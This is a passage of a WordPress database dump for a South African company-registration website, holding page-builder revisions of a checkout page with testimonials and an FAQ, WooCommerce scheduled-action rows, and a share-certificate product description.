Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"5\" _address=\"1.0.1.5\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"6\" _address=\"1.0.1.6\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"7\" _address=\"1.0.1.7\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"8\" _address=\"1.0.1.8\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"9\" _address=\"1.0.1.9\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"10\" _address=\"1.0.1.10\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\" _i=\"11\" _address=\"1.0.1.11\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"12\" _address=\"1.0.1.12\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\" _i=\"13\" _address=\"1.0.1.13\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"1.0.1.13.0\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"1.0.1.13.1\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"2\" _address=\"1.0.1.13.2\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.3\" custom_margin=\"-43px||||false|false\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.27.3\" _i=\"0\" _address=\"2.0.1.0\"]<p style=\"text-align: right;\">@2018</p>\n<p style=\"text-align: right;\">Powered By: Digital Niche Marketing (Pty) Ltd</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','inherit','closed','closed','','31362-revision-v1','','','2019-08-26 15:41:09','2019-08-26 13:41:09','',31362,'https://companyregistration.online/31362-revision-v1/',0,'revision','',0),(33326,1,'2019-08-26 15:39:38','2019-08-26 13:39:38','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\" custom_padding=\"0|0px|0|0px|false|false\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.27.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"43px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_horizontal_length=\"0.12em\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-6px||||false|false\" hover_enabled=\"0\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.1.0\"]<h3>Get Your Company Registered by professional who know what their stuff<span style=\"color: #ffffff;\"></span></h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"0.0.1\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.2.0\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"1\" _address=\"0.0.2.1\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" _i=\"2\" _address=\"0.0.2.2\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\" hover_enabled=\"0\" _i=\"3\" _address=\"0.0.2.3\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset1\" box_shadow_horizontal=\"-13px\" box_shadow_vertical=\"-11px\" box_shadow_blur=\"16px\" custom_margin=\"-174px||||false|false\" custom_padding=\"0px||120px||false|false\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\" _i=\"0\" _address=\"1.0.0.0\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_number_counter title=\"Companies registered by our consultants exceed\" number=\"3520\" _builder_version=\"3.27.3\" percent_sign=\"off\" title_font=\"Poppins||||||||\" hover_enabled=\"0\" custom_padding=\"||10px||false|false\"][/et_pb_number_counter][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.27.3\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\" hover_enabled=\"0\" _i=\"0\" _address=\"1.0.1.0\" animation_style=\"slide\" animation_direction=\"right\" transform_translate=\"129px|0px\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund Policy.\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" header_font=\"Poppins||||||||\" header_3_font=\"Poppins|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"1\" _address=\"1.0.1.1\"]<h3>100% Money Back. No-Risk.</h3>\r\n<h3>Full Refund Policy.</h3>\r\nNo Risk guarantee, if you not happy at any time, prior to registration of your company, we will refund you 100%, no questions asked.[/et_pb_text][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" _i=\"2\" _address=\"1.0.1.2\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Success Stories\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"3\" _address=\"1.0.1.3\"]<h3>Success Stories</h3>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.23\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"4\" _address=\"1.0.1.4\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"5\" _address=\"1.0.1.5\"]<p>\"They have impressed me with their knowledge and efficiency. The professionals have always been very helpful to myself and my clients.”</p>[/et_pb_text][et_pb_blurb title=\"Gretchen Rose Matthews \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"6\" _address=\"1.0.1.6\"]<p>Senior Consultant, Constructive Consulting Group (Pty) Ltd</p>[/et_pb_blurb][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Star Image\" _builder_version=\"3.26.3\" max_width=\"20%\" module_alignment=\"left\" custom_margin=\"20px||10px||false|false\" filter_hue_rotate=\"22deg\" filter_saturate=\"200%\" filter_brightness=\"85%\" filter_contrast=\"172%\" _i=\"7\" _address=\"1.0.1.7\"][/et_pb_image][et_pb_text admin_label=\"Testimonial Text\" _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" text_text_color=\"#000000\" text_font_size=\"13px\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||20px\" _i=\"8\" _address=\"1.0.1.8\"]<p>“companyregistration.online is one of the most dynamic, modest, modern, up to date and well informed service providers we have ever used”</p>[/et_pb_text][et_pb_blurb title=\"Silas Gidzha \" icon_placement=\"left\" admin_label=\"Testimonial: Image and Name\" module_class=\"testimonial-blurb\" _builder_version=\"3.26.3\" header_font=\"Roboto|700|||||||\" header_font_size=\"12px\" body_font=\"Roboto|100|||||||\" body_text_color=\"#636363\" body_font_size=\"12px\" body_line_height=\"1.3em\" custom_margin=\"-15px||||false|false\" _i=\"9\" _address=\"1.0.1.9\"]<p>CEO, S&amp;S Orthopedic Services (Pty)Ltd</p>[/et_pb_blurb][et_pb_divider color=\"#000000\" divider_style=\"dashed\" divider_position=\"center\" _builder_version=\"3.19.7\" height=\"46px\" custom_margin=\"||20px\" _i=\"10\" _address=\"1.0.1.10\"][/et_pb_divider][et_pb_text admin_label=\"Headline: Frequent Queries\" _builder_version=\"3.19.11\" text_font=\"Roboto||||||||\" header_font=\"||||||||\" header_3_font=\"Roboto|500|||||||\" header_3_text_color=\"#242f6b\" header_3_font_size=\"18px\" header_3_line_height=\"1.4em\" custom_margin=\"||9px\" _i=\"13\" _address=\"1.0.1.13\"]<h3>Frequent Queries</h3>[/et_pb_text][et_pb_accordion open_toggle_text_color=\"#242f6b\" open_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"rgba(36,47,107,0.8)\" closed_toggle_background_color=\"#ffffff\" admin_label=\"Accordion: FAQ\" _builder_version=\"3.26.3\" toggle_font=\"Roboto|500|||||||\" body_font=\"Roboto||||||||\" body_text_color=\"#000000\" border_color_all=\"#f2f2f2\" _i=\"14\" _address=\"1.0.1.14\"][et_pb_accordion_item title=\"Where are your offices located?\" open=\"on\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"1.0.1.14.0\"]<p>101 Rose Avenue, Lenasia, Johannesburg, 1827. Call 010 592 7717</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"What do I need to register my company ?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"1.0.1.14.1\" open=\"off\"]<p>Once the order is made an email will be sent containg all the all the requirements</p>[/et_pb_accordion_item][et_pb_accordion_item title=\"How long does it take to register?\" icon_color=\"#242f6b\" _builder_version=\"3.26.3\" _i=\"2\" _address=\"1.0.1.14.2\" open=\"off\"]<p>Typically it takes between 3-5days, CIPC delays may extend the duration</p>[/et_pb_accordion_item][/et_pb_accordion][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.3\" custom_margin=\"-43px||||false|false\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web-e1563787290497.png\" _builder_version=\"3.26.3\" width=\"54%\" max_width=\"54%\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.3\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"0\" _address=\"2.0.1.0\"]<p style=\"text-align: right;\">@2018</p>\n<p style=\"text-align: right;\">Powered By: Digital Niche Marketing (Pty) Ltd</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','SA Company Registration Checkout','','inherit','closed','closed','','31362-revision-v1','','','2019-08-26 15:39:38','2019-08-26 13:39:38','',31362,'https://companyregistration.online/31362-revision-v1/',0,'revision','',0),(33330,0,'2019-08-26 14:01:48','2019-08-26 14:01:48','[]','woocommerce_update_marketplace_suggestions','','publish','open','closed','','scheduled-action-5d63e6817eb384.62627950-eftBfPPUhyJfmwl1722Cv9FxvbwWkbCC','','','2019-08-26 16:02:41','2019-08-26 14:02:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33330',0,'scheduled-action','',3),(33333,1,'2019-08-26 16:24:39','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2019-08-26 16:24:39','0000-00-00 00:00:00','',0,'https://companyregistration.online/?p=33333',0,'post','',0),(33334,1,'2019-08-26 16:34:32','2019-08-26 14:34:32','<strong>Your share certificate and the Company Register?</strong>\r\nEvery Company must have a Company Register and minute book. The Register is like the ID book of the company containing all the relevant information of the directors and shareholder and minutes of meetings etc. The company register which we sell have perforated blank pages so that the minutes of each meeting, which are typed on separate pages, can be pasted into the book without the book getting too large. The company register must be held at the registered address. Note: The page must be numbered numerically to eliminate pages going missing','Share Certificates','A share certificate is legal proof of ownership of a company or the shares in a company if there are more than 1 shareholders.\r\n\r\nIt entitles them to have a share in the profit and in some instances, even a share in the decision making process.','publish','open','closed','','share-certificates','','','2019-08-26 16:36:35','2019-08-26 14:36:35','',0,'https://companyregistration.online/?post_type=product&#038;p=33334',0,'product','',0),(33335,1,'2019-08-26 16:30:12','0000-00-00 00:00:00','','AUTO-DRAFT','','auto-draft','open','closed','','','','','2019-08-26 16:30:12','0000-00-00 00:00:00','',0,'https://companyregistration.online/?post_type=product&p=33335',0,'product','',0),(33341,0,'2019-08-26 19:27:18','2019-08-26 19:27:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6435ecbf5bb2.72487477-W8Ni2RkwJl5pxi2Qd88QDpDTRVjRZ8aE','','','2019-08-26 21:41:32','2019-08-26 19:41:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33341',1,'scheduled-action','',3),(33343,0,'2019-08-26 20:41:32','2019-08-26 20:41:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d64472f332ca4.45701833-uGsg0NoLyO8bCS1kSpmGgl2ohwofnmpY','','','2019-08-26 22:55:11','2019-08-26 20:55:11','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33343',1,'scheduled-action','',3),(33345,0,'2019-08-26 21:55:11','2019-08-26 21:55:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d645a254d1492.73794218-iA7wuXpc4UTGTsfkKilJgxwj19QZoZu5','','','2019-08-27 00:16:05','2019-08-26 22:16:05','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33345',1,'scheduled-action','',3),(33347,0,'2019-08-26 23:16:05','2019-08-26 23:16:05','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6469f6425346.79329497-SkpQkmcoqKg30nIvm7bzPKAheZxiZfkf','','','2019-08-27 01:23:34','2019-08-26 23:23:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33347',0,'scheduled-action','',3),(33349,0,'2019-08-27 00:23:34','2019-08-27 00:23:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d647bbf969b55.76741659-phn3r1urv7NKilb8ziqSCZRDf5iw2qMB','','','2019-08-27 02:39:27','2019-08-27 00:39:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33349',0,'scheduled-action','',3),(33351,0,'2019-08-27 01:39:27','2019-08-27 01:39:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d648e652a6a21.37065402-QLAPFf7yRInSRsCFnMMByfg0VOMueUow','','','2019-08-27 03:59:01','2019-08-27 01:59:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33351',0,'scheduled-action','',3),(33353,0,'2019-08-27 02:59:01','2019-08-27 02:59:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d649daa7f7e41.13153050-rJ0sdMm8FFhT8l5cr7q1S2SUnEwpK3yj','','','2019-08-27 05:04:10','2019-08-27 03:04:10','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33353',0,'scheduled-action','',3),(33355,0,'2019-08-27 04:04:10','2019-08-27 04:04:10','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d64b59c8b6ec9.46153402-PlqnhUKtvy2CaCbs5FkPUq7UStnBCfiB','','','2019-08-27 06:46:20','2019-08-27 04:46:20','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33355',1,'scheduled-action','',3),(33357,0,'2019-08-27 05:46:20','2019-08-27 05:46:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d64c984927698.29560481-EaFMsLJzSRv49kkXuHgm83vIR2Z8L56Z','','','2019-08-27 08:11:16','2019-08-27 06:11:16','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33357',1,'scheduled-action','',3),(33359,0,'2019-08-27 07:11:16','2019-08-27 07:11:16','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d64da9fa6c224.72927613-H2DnHbEFBoackqa20FXFux3ezNcwcxQZ','','','2019-08-27 09:24:15','2019-08-27 07:24:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33359',0,'scheduled-action','',3),(33361,0,'2019-08-27 08:24:15','2019-08-27 08:24:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d64e8e639f413.19742267-mD4gKGPrLOCLGU64lp08JefA3KcCyXft','','','2019-08-27 10:25:10','2019-08-27 08:25:10','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33361',0,'scheduled-action','',3),(33363,0,'2019-08-27 09:25:10','2019-08-27 09:25:10','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d64f702adeb65.40508845-bE99q42dmqF2KGtnKfII85bTDJirOYzx','','','2019-08-27 11:25:22','2019-08-27 09:25:22','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33363',0,'scheduled-action','',3),(33365,0,'2019-08-27 10:25:22','2019-08-27 10:25:22','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d65051b55f848.66932055-cgYayqFpc4Xi7xkYTNMtJU8XYB0tnTmj','','','2019-08-27 12:25:31','2019-08-27 10:25:31','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33365',0,'scheduled-action','',3),(33367,0,'2019-08-27 11:25:31','2019-08-27 11:25:31','[]','wc_admin_unsnooze_admin_notes','','pending','open','closed','','','','','2019-08-27 11:25:31','2019-08-27 11:25:31','',0,'https://companyregistration.online/?post_type=scheduled-action&p=33367',0,'scheduled-action','',1),(33329,1,'2019-08-26 15:48:12','2019-08-26 13:48:12','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\" custom_padding=\"0|0px|0|0px|false|false\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.27.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"43px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_horizontal_length=\"0.12em\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-6px||||false|false\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.0.0\"]<h3>Get Your Company Registered By a Professional Consultant<span style=\"color: #ffffff;\"></span></h3>[/et_pb_text][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.27.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins|300|||||||\" header_3_font_size=\"25px\" header_3_line_height=\"1.2em\" header_3_text_shadow_style=\"preset5\" header_3_text_shadow_vertical_length=\"0.13em\" header_3_text_shadow_blur_strength=\"0.02em\" background_layout=\"dark\" custom_margin=\"-6px||||false|false\" hover_enabled=\"0\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.0.0\" header_3_text_align=\"center\"]<h3>Companies are typically registered within 3 days<span style=\"color: #ffffff;\"></span></h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"0.0.1\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\" _i=\"0\" _address=\"0.0.1.0\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" 